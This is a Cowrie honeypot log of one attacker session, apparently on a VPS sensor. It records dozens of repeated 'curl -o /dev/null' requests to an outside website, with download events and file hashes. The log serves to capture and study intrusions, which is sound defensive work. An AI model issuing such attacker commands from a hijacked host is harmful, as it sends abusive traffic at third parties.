{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:40:06.924533Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:06.925934Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.file_download.failed","url":"https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:06.958557Z","message":"Attempt to download file(s) from URL (https://ladamoscow.com/) failed","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:40:06.962515Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:06.963493Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:40:07.041340Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:07.042647Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:40:07.081177Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:07.082139Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.file_download","url":"https://ladamoscow.com/","outfile":"var/lib/cowrie/downloads/cc5d50fb133c9ce87777ee3c94fc11209b2144b31d2bd7eab69a5b778a04282c","shasum":"cc5d50fb133c9ce87777ee3c94fc11209b2144b31d2bd7eab69a5b778a04282c","sensor":"my-vps","timestamp":"2025-08-28T07:40:07.084852Z","message":"Downloaded URL (https://ladamoscow.com/) with SHA-256 cc5d50fb133c9ce87777ee3c94fc11209b2144b31d2bd7eab69a5b778a04282c to var/lib/cowrie/downloads/cc5d50fb133c9ce87777ee3c94fc11209b2144b31d2bd7eab69a5b778a04282c","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.file_download","url":"https://ladamoscow.com/","outfile":"var/lib/cowrie/downloads/145f14f8268cc94e90a31b788e1d0eefa917e33e057bcba2cfbb91ae393c61d5","shasum":"145f14f8268cc94e90a31b788e1d0eefa917e33e057bcba2cfbb91ae393c61d5","sensor":"my-vps","timestamp":"2025-08-28T07:40:07.113720Z","message":"Downloaded URL (https://ladamoscow.com/) with SHA-256 145f14f8268cc94e90a31b788e1d0eefa917e33e057bcba2cfbb91ae393c61d5 to var/lib/cowrie/downloads/145f14f8268cc94e90a31b788e1d0eefa917e33e057bcba2cfbb91ae393c61d5","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.file_download","url":"https://ladamoscow.com/","outfile":"var/lib/cowrie/downloads/1b4ee39e0583c50ddb34b5319eb3a583ad580f85f6d756b6359b688334b53c0f","shasum":"1b4ee39e0583c50ddb34b5319eb3a583ad580f85f6d756b6359b688334b53c0f","sensor":"my-vps","timestamp":"2025-08-28T07:40:07.166301Z","message":"Downloaded URL (https://ladamoscow.com/) with SHA-256 1b4ee39e0583c50ddb34b5319eb3a583ad580f85f6d756b6359b688334b53c0f to var/lib/cowrie/downloads/1b4ee39e0583c50ddb34b5319eb3a583ad580f85f6d756b6359b688334b53c0f","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:40:07.167885Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:07.168727Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.file_download","url":"https://ladamoscow.com/","outfile":"var/lib/cowrie/downloads/1b4ee39e0583c50ddb34b5319eb3a583ad580f85f6d756b6359b688334b53c0f","shasum":"1b4ee39e0583c50ddb34b5319eb3a583ad580f85f6d756b6359b688334b53c0f","sensor":"my-vps","timestamp":"2025-08-28T07:40:07.178646Z","message":"Downloaded URL (https://ladamoscow.com/) with SHA-256 1b4ee39e0583c50ddb34b5319eb3a583ad580f85f6d756b6359b688334b53c0f to var/lib/cowrie/downloads/1b4ee39e0583c50ddb34b5319eb3a583ad580f85f6d756b6359b688334b53c0f","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:40:07.222862Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:07.226579Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:40:07.274527Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:07.275576Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.file_download","url":"https://ladamoscow.com/","outfile":"var/lib/cowrie/downloads/fe10210b679e9681f6708c3962a0181d9c36a64f8243c86de2483921a6f72c2e","shasum":"fe10210b679e9681f6708c3962a0181d9c36a64f8243c86de2483921a6f72c2e","sensor":"my-vps","timestamp":"2025-08-28T07:40:07.309256Z","message":"Downloaded URL (https://ladamoscow.com/) with SHA-256 fe10210b679e9681f6708c3962a0181d9c36a64f8243c86de2483921a6f72c2e to var/lib/cowrie/downloads/fe10210b679e9681f6708c3962a0181d9c36a64f8243c86de2483921a6f72c2e","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:40:07.347564Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:07.348608Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.file_download.failed","url":"https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:07.349969Z","message":"Attempt to download file(s) from URL (https://ladamoscow.com/) failed","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:40:07.387300Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:07.388262Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.file_download.failed","url":"https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:07.389369Z","message":"Attempt to download file(s) from URL (https://ladamoscow.com/) failed","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:40:07.428936Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:07.429904Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:40:07.475659Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:07.478130Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.file_download.failed","url":"https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:07.508854Z","message":"Attempt to download file(s) from URL (https://ladamoscow.com/) failed","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:40:07.552751Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:07.553690Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:40:07.592201Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:07.593084Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:40:07.645219Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:07.646274Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.file_download.failed","url":"https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:07.660040Z","message":"Attempt to download file(s) from URL (https://ladamoscow.com/) failed","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:40:07.682963Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:07.683885Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.file_download","url":"https://ladamoscow.com/","outfile":"var/lib/cowrie/downloads/ab436fbd46aa1807404dccc2ebe48d9b530c32c1aa6b0978bda5649e4ab5d3ba","shasum":"ab436fbd46aa1807404dccc2ebe48d9b530c32c1aa6b0978bda5649e4ab5d3ba","sensor":"my-vps","timestamp":"2025-08-28T07:40:07.691991Z","message":"Downloaded URL (https://ladamoscow.com/) with SHA-256 ab436fbd46aa1807404dccc2ebe48d9b530c32c1aa6b0978bda5649e4ab5d3ba to var/lib/cowrie/downloads/ab436fbd46aa1807404dccc2ebe48d9b530c32c1aa6b0978bda5649e4ab5d3ba","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.file_download","url":"https://ladamoscow.com/","outfile":"var/lib/cowrie/downloads/ab436fbd46aa1807404dccc2ebe48d9b530c32c1aa6b0978bda5649e4ab5d3ba","shasum":"ab436fbd46aa1807404dccc2ebe48d9b530c32c1aa6b0978bda5649e4ab5d3ba","sensor":"my-vps","timestamp":"2025-08-28T07:40:07.693949Z","message":"Downloaded URL (https://ladamoscow.com/) with SHA-256 ab436fbd46aa1807404dccc2ebe48d9b530c32c1aa6b0978bda5649e4ab5d3ba to var/lib/cowrie/downloads/ab436fbd46aa1807404dccc2ebe48d9b530c32c1aa6b0978bda5649e4ab5d3ba","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.file_download","url":"https://ladamoscow.com/","outfile":"var/lib/cowrie/downloads/ab436fbd46aa1807404dccc2ebe48d9b530c32c1aa6b0978bda5649e4ab5d3ba","shasum":"ab436fbd46aa1807404dccc2ebe48d9b530c32c1aa6b0978bda5649e4ab5d3ba","sensor":"my-vps","timestamp":"2025-08-28T07:40:07.697315Z","message":"Downloaded URL (https://ladamoscow.com/) with SHA-256 ab436fbd46aa1807404dccc2ebe48d9b530c32c1aa6b0978bda5649e4ab5d3ba to var/lib/cowrie/downloads/ab436fbd46aa1807404dccc2ebe48d9b530c32c1aa6b0978bda5649e4ab5d3ba","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.file_download","url":"https://ladamoscow.com/","outfile":"var/lib/cowrie/downloads/ab436fbd46aa1807404dccc2ebe48d9b530c32c1aa6b0978bda5649e4ab5d3ba","shasum":"ab436fbd46aa1807404dccc2ebe48d9b530c32c1aa6b0978bda5649e4ab5d3ba","sensor":"my-vps","timestamp":"2025-08-28T07:40:07.699293Z","message":"Downloaded URL (https://ladamoscow.com/) with SHA-256 ab436fbd46aa1807404dccc2ebe48d9b530c32c1aa6b0978bda5649e4ab5d3ba to var/lib/cowrie/downloads/ab436fbd46aa1807404dccc2ebe48d9b530c32c1aa6b0978bda5649e4ab5d3ba","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.file_download","url":"https://ladamoscow.com/","outfile":"var/lib/cowrie/downloads/ab436fbd46aa1807404dccc2ebe48d9b530c32c1aa6b0978bda5649e4ab5d3ba","shasum":"ab436fbd46aa1807404dccc2ebe48d9b530c32c1aa6b0978bda5649e4ab5d3ba","sensor":"my-vps","timestamp":"2025-08-28T07:40:07.702226Z","message":"Downloaded URL (https://ladamoscow.com/) with SHA-256 ab436fbd46aa1807404dccc2ebe48d9b530c32c1aa6b0978bda5649e4ab5d3ba to var/lib/cowrie/downloads/ab436fbd46aa1807404dccc2ebe48d9b530c32c1aa6b0978bda5649e4ab5d3ba","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.file_download","url":"https://ladamoscow.com/","outfile":"var/lib/cowrie/downloads/ab436fbd46aa1807404dccc2ebe48d9b530c32c1aa6b0978bda5649e4ab5d3ba","shasum":"ab436fbd46aa1807404dccc2ebe48d9b530c32c1aa6b0978bda5649e4ab5d3ba","sensor":"my-vps","timestamp":"2025-08-28T07:40:07.703624Z","message":"Downloaded URL (https://ladamoscow.com/) with SHA-256 ab436fbd46aa1807404dccc2ebe48d9b530c32c1aa6b0978bda5649e4ab5d3ba to var/lib/cowrie/downloads/ab436fbd46aa1807404dccc2ebe48d9b530c32c1aa6b0978bda5649e4ab5d3ba","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.file_download","url":"https://ladamoscow.com/","outfile":"var/lib/cowrie/downloads/ab436fbd46aa1807404dccc2ebe48d9b530c32c1aa6b0978bda5649e4ab5d3ba","shasum":"ab436fbd46aa1807404dccc2ebe48d9b530c32c1aa6b0978bda5649e4ab5d3ba","sensor":"my-vps","timestamp":"2025-08-28T07:40:07.706727Z","message":"Downloaded URL (https://ladamoscow.com/) with SHA-256 ab436fbd46aa1807404dccc2ebe48d9b530c32c1aa6b0978bda5649e4ab5d3ba to var/lib/cowrie/downloads/ab436fbd46aa1807404dccc2ebe48d9b530c32c1aa6b0978bda5649e4ab5d3ba","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.file_download","url":"https://ladamoscow.com/","outfile":"var/lib/cowrie/downloads/1b4ee39e0583c50ddb34b5319eb3a583ad580f85f6d756b6359b688334b53c0f","shasum":"1b4ee39e0583c50ddb34b5319eb3a583ad580f85f6d756b6359b688334b53c0f","sensor":"my-vps","timestamp":"2025-08-28T07:40:07.709281Z","message":"Downloaded URL (https://ladamoscow.com/) with SHA-256 1b4ee39e0583c50ddb34b5319eb3a583ad580f85f6d756b6359b688334b53c0f to var/lib/cowrie/downloads/1b4ee39e0583c50ddb34b5319eb3a583ad580f85f6d756b6359b688334b53c0f","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.file_download","url":"https://ladamoscow.com/","outfile":"var/lib/cowrie/downloads/ab436fbd46aa1807404dccc2ebe48d9b530c32c1aa6b0978bda5649e4ab5d3ba","shasum":"ab436fbd46aa1807404dccc2ebe48d9b530c32c1aa6b0978bda5649e4ab5d3ba","sensor":"my-vps","timestamp":"2025-08-28T07:40:07.735676Z","message":"Downloaded URL (https://ladamoscow.com/) with SHA-256 ab436fbd46aa1807404dccc2ebe48d9b530c32c1aa6b0978bda5649e4ab5d3ba to var/lib/cowrie/downloads/ab436fbd46aa1807404dccc2ebe48d9b530c32c1aa6b0978bda5649e4ab5d3ba","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.file_download","url":"https://ladamoscow.com/","outfile":"var/lib/cowrie/downloads/ab436fbd46aa1807404dccc2ebe48d9b530c32c1aa6b0978bda5649e4ab5d3ba","shasum":"ab436fbd46aa1807404dccc2ebe48d9b530c32c1aa6b0978bda5649e4ab5d3ba","sensor":"my-vps","timestamp":"2025-08-28T07:40:07.737446Z","message":"Downloaded URL (https://ladamoscow.com/) with SHA-256 ab436fbd46aa1807404dccc2ebe48d9b530c32c1aa6b0978bda5649e4ab5d3ba to var/lib/cowrie/downloads/ab436fbd46aa1807404dccc2ebe48d9b530c32c1aa6b0978bda5649e4ab5d3ba","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.file_download","url":"https://ladamoscow.com/","outfile":"var/lib/cowrie/downloads/ab436fbd46aa1807404dccc2ebe48d9b530c32c1aa6b0978bda5649e4ab5d3ba","shasum":"ab436fbd46aa1807404dccc2ebe48d9b530c32c1aa6b0978bda5649e4ab5d3ba","sensor":"my-vps","timestamp":"2025-08-28T07:40:07.740201Z","message":"Downloaded URL (https://ladamoscow.com/) with SHA-256 ab436fbd46aa1807404dccc2ebe48d9b530c32c1aa6b0978bda5649e4ab5d3ba to var/lib/cowrie/downloads/ab436fbd46aa1807404dccc2ebe48d9b530c32c1aa6b0978bda5649e4ab5d3ba","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.file_download","url":"https://ladamoscow.com/","outfile":"var/lib/cowrie/downloads/ab436fbd46aa1807404dccc2ebe48d9b530c32c1aa6b0978bda5649e4ab5d3ba","shasum":"ab436fbd46aa1807404dccc2ebe48d9b530c32c1aa6b0978bda5649e4ab5d3ba","sensor":"my-vps","timestamp":"2025-08-28T07:40:07.742256Z","message":"Downloaded URL (https://ladamoscow.com/) with SHA-256 ab436fbd46aa1807404dccc2ebe48d9b530c32c1aa6b0978bda5649e4ab5d3ba to var/lib/cowrie/downloads/ab436fbd46aa1807404dccc2ebe48d9b530c32c1aa6b0978bda5649e4ab5d3ba","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.file_download","url":"https://ladamoscow.com/","outfile":"var/lib/cowrie/downloads/ab436fbd46aa1807404dccc2ebe48d9b530c32c1aa6b0978bda5649e4ab5d3ba","shasum":"ab436fbd46aa1807404dccc2ebe48d9b530c32c1aa6b0978bda5649e4ab5d3ba","sensor":"my-vps","timestamp":"2025-08-28T07:40:07.744972Z","message":"Downloaded URL (https://ladamoscow.com/) with SHA-256 ab436fbd46aa1807404dccc2ebe48d9b530c32c1aa6b0978bda5649e4ab5d3ba to var/lib/cowrie/downloads/ab436fbd46aa1807404dccc2ebe48d9b530c32c1aa6b0978bda5649e4ab5d3ba","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.file_download","url":"https://ladamoscow.com/","outfile":"var/lib/cowrie/downloads/ab436fbd46aa1807404dccc2ebe48d9b530c32c1aa6b0978bda5649e4ab5d3ba","shasum":"ab436fbd46aa1807404dccc2ebe48d9b530c32c1aa6b0978bda5649e4ab5d3ba","sensor":"my-vps","timestamp":"2025-08-28T07:40:07.746538Z","message":"Downloaded URL (https://ladamoscow.com/) with SHA-256 ab436fbd46aa1807404dccc2ebe48d9b530c32c1aa6b0978bda5649e4ab5d3ba to var/lib/cowrie/downloads/ab436fbd46aa1807404dccc2ebe48d9b530c32c1aa6b0978bda5649e4ab5d3ba","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.file_download","url":"https://ladamoscow.com/","outfile":"var/lib/cowrie/downloads/ab436fbd46aa1807404dccc2ebe48d9b530c32c1aa6b0978bda5649e4ab5d3ba","shasum":"ab436fbd46aa1807404dccc2ebe48d9b530c32c1aa6b0978bda5649e4ab5d3ba","sensor":"my-vps","timestamp":"2025-08-28T07:40:07.749401Z","message":"Downloaded URL (https://ladamoscow.com/) with SHA-256 ab436fbd46aa1807404dccc2ebe48d9b530c32c1aa6b0978bda5649e4ab5d3ba to var/lib/cowrie/downloads/ab436fbd46aa1807404dccc2ebe48d9b530c32c1aa6b0978bda5649e4ab5d3ba","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:40:07.751580Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:07.752376Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.file_download","url":"https://ladamoscow.com/","outfile":"var/lib/cowrie/downloads/ab436fbd46aa1807404dccc2ebe48d9b530c32c1aa6b0978bda5649e4ab5d3ba","shasum":"ab436fbd46aa1807404dccc2ebe48d9b530c32c1aa6b0978bda5649e4ab5d3ba","sensor":"my-vps","timestamp":"2025-08-28T07:40:07.767629Z","message":"Downloaded URL (https://ladamoscow.com/) with SHA-256 ab436fbd46aa1807404dccc2ebe48d9b530c32c1aa6b0978bda5649e4ab5d3ba to var/lib/cowrie/downloads/ab436fbd46aa1807404dccc2ebe48d9b530c32c1aa6b0978bda5649e4ab5d3ba","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.file_download","url":"https://ladamoscow.com/","outfile":"var/lib/cowrie/downloads/ab436fbd46aa1807404dccc2ebe48d9b530c32c1aa6b0978bda5649e4ab5d3ba","shasum":"ab436fbd46aa1807404dccc2ebe48d9b530c32c1aa6b0978bda5649e4ab5d3ba","sensor":"my-vps","timestamp":"2025-08-28T07:40:07.769387Z","message":"Downloaded URL (https://ladamoscow.com/) with SHA-256 ab436fbd46aa1807404dccc2ebe48d9b530c32c1aa6b0978bda5649e4ab5d3ba to var/lib/cowrie/downloads/ab436fbd46aa1807404dccc2ebe48d9b530c32c1aa6b0978bda5649e4ab5d3ba","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.file_download","url":"https://ladamoscow.com/","outfile":"var/lib/cowrie/downloads/ab436fbd46aa1807404dccc2ebe48d9b530c32c1aa6b0978bda5649e4ab5d3ba","shasum":"ab436fbd46aa1807404dccc2ebe48d9b530c32c1aa6b0978bda5649e4ab5d3ba","sensor":"my-vps","timestamp":"2025-08-28T07:40:07.773917Z","message":"Downloaded URL (https://ladamoscow.com/) with SHA-256 ab436fbd46aa1807404dccc2ebe48d9b530c32c1aa6b0978bda5649e4ab5d3ba to var/lib/cowrie/downloads/ab436fbd46aa1807404dccc2ebe48d9b530c32c1aa6b0978bda5649e4ab5d3ba","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.file_download","url":"https://ladamoscow.com/","outfile":"var/lib/cowrie/downloads/ab436fbd46aa1807404dccc2ebe48d9b530c32c1aa6b0978bda5649e4ab5d3ba","shasum":"ab436fbd46aa1807404dccc2ebe48d9b530c32c1aa6b0978bda5649e4ab5d3ba","sensor":"my-vps","timestamp":"2025-08-28T07:40:07.775712Z","message":"Downloaded URL (https://ladamoscow.com/) with SHA-256 ab436fbd46aa1807404dccc2ebe48d9b530c32c1aa6b0978bda5649e4ab5d3ba to var/lib/cowrie/downloads/ab436fbd46aa1807404dccc2ebe48d9b530c32c1aa6b0978bda5649e4ab5d3ba","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.file_download.failed","url":"https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:07.792423Z","message":"Attempt to download file(s) from URL (https://ladamoscow.com/) failed","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:40:07.806512Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:07.807480Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.file_download","url":"https://ladamoscow.com/","outfile":"var/lib/cowrie/downloads/ab436fbd46aa1807404dccc2ebe48d9b530c32c1aa6b0978bda5649e4ab5d3ba","shasum":"ab436fbd46aa1807404dccc2ebe48d9b530c32c1aa6b0978bda5649e4ab5d3ba","sensor":"my-vps","timestamp":"2025-08-28T07:40:07.820950Z","message":"Downloaded URL (https://ladamoscow.com/) with SHA-256 ab436fbd46aa1807404dccc2ebe48d9b530c32c1aa6b0978bda5649e4ab5d3ba to var/lib/cowrie/downloads/ab436fbd46aa1807404dccc2ebe48d9b530c32c1aa6b0978bda5649e4ab5d3ba","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.file_download.failed","url":"https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:07.830472Z","message":"Attempt to download file(s) from URL (https://ladamoscow.com/) failed","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:40:07.909203Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:07.910253Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.file_download","url":"https://ladamoscow.com/","outfile":"var/lib/cowrie/downloads/ab436fbd46aa1807404dccc2ebe48d9b530c32c1aa6b0978bda5649e4ab5d3ba","shasum":"ab436fbd46aa1807404dccc2ebe48d9b530c32c1aa6b0978bda5649e4ab5d3ba","sensor":"my-vps","timestamp":"2025-08-28T07:40:07.931388Z","message":"Downloaded URL (https://ladamoscow.com/) with SHA-256 ab436fbd46aa1807404dccc2ebe48d9b530c32c1aa6b0978bda5649e4ab5d3ba to var/lib/cowrie/downloads/ab436fbd46aa1807404dccc2ebe48d9b530c32c1aa6b0978bda5649e4ab5d3ba","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.file_download","url":"https://ladamoscow.com/","outfile":"var/lib/cowrie/downloads/ab436fbd46aa1807404dccc2ebe48d9b530c32c1aa6b0978bda5649e4ab5d3ba","shasum":"ab436fbd46aa1807404dccc2ebe48d9b530c32c1aa6b0978bda5649e4ab5d3ba","sensor":"my-vps","timestamp":"2025-08-28T07:40:07.933205Z","message":"Downloaded URL (https://ladamoscow.com/) with SHA-256 ab436fbd46aa1807404dccc2ebe48d9b530c32c1aa6b0978bda5649e4ab5d3ba to var/lib/cowrie/downloads/ab436fbd46aa1807404dccc2ebe48d9b530c32c1aa6b0978bda5649e4ab5d3ba","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.file_download","url":"https://ladamoscow.com/","outfile":"var/lib/cowrie/downloads/ab436fbd46aa1807404dccc2ebe48d9b530c32c1aa6b0978bda5649e4ab5d3ba","shasum":"ab436fbd46aa1807404dccc2ebe48d9b530c32c1aa6b0978bda5649e4ab5d3ba","sensor":"my-vps","timestamp":"2025-08-28T07:40:07.938973Z","message":"Downloaded URL (https://ladamoscow.com/) with SHA-256 ab436fbd46aa1807404dccc2ebe48d9b530c32c1aa6b0978bda5649e4ab5d3ba to var/lib/cowrie/downloads/ab436fbd46aa1807404dccc2ebe48d9b530c32c1aa6b0978bda5649e4ab5d3ba","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
